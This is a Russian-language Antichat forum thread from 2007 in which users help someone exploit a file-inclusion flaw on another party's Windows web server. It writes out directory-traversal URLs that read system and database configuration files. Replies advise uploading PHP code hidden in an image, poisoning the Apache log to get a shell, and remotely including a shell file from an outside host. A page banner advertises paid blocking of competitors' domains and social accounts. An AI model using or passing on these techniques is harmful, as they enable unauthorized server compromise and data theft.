Форум АНТИЧАТ - инклюд на windows тачке

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
инклюд на windows тачке

Опции темы

Поиск в этой теме

Опции просмотра

инклюд на windows тачке

15.09.2007, 16:57

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

инклюд на windows тачке

НАйден инклюд типа www.site.com/index.php?item=../../../../../../../../../boot.ini%00
какова дальнейшая последовательность действий? пытался передать параметры для cmd.exe, не выходит. Все конфиги в .php файлах, то есть инклудятся без отображения. Пытался вытащить mdf файлы по известным названиям баз данных, но тоже облом - пути вроде подобрал (/index.php?item=../../../../../../../../program%20files/microsoft%20sql%20server/mssql.1/mssql/binn/sqlctr.ini%00 выводится), а вот мдфники не выдираются..
Вобщем хелп, что тут можно попытатся сделать?

Последний раз редактировалось Светлый; 15.09.2007 в 17:03..

15.09.2007, 17:23

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

мб на сайте есть форум? ну или какой нибудь скрипт заливки картинок. Заливаешь картинку с пшп кодом внутри и инклудишь её

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

15.09.2007, 17:46

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

Да в том то и дело, что все форумы и галереи лежат на основном хосте, а этот дополнительный чисто под регистрации онлайн игрушки. Заливок никаких как и удалённого инклюда.

15.09.2007, 20:58

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

Провел на форуме:
4325663

Репутация: 240

Отправить сообщение для The_HuliGun с помощью ICQ

Ищи лог апача.

Код:

Program Files\Apache Group\Apache\logs\access_log

Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.

15.09.2007, 21:17

ant0ha

Участник форума

Регистрация: 22.05.2007

Сообщений: 144

Провел на форуме:
306311

Репутация: 119

приинклудь шел и всех делов то

Код:

www.site.com/index.php?item=http://www.site.ru/shell.txt

15.09.2007, 21:22

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

Сообщение от ant0ha

приинклудь шел и всех делов то

ты наркоман?

Цитата:

Сообщение от Светлый

Заливок никаких как и удалённого инклюда

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

16.09.2007, 03:54

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

Цитата:

Сообщение от The_HuliGun

Ищи лог апача.

Код:

Program Files\Apache Group\Apache\logs\access_log

Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.

Мм.. спасибо за дельный совет, завтра попробую. Сервак просто в дауне.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Windows Vista FAQ	~!DoK_tOR!~	Windows	4	30.11.2007 00:06
Windows Vista и XP на одном компьютере	-n00by-	Чужие Статьи	10	27.09.2007 06:24
Ошибки Windows и их устранение.	Серый	Windows	6	15.12.2006 14:44
Faq Что делать, если компьютер не работает	zl0ba	Болталка	18	10.12.2006 11:27

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход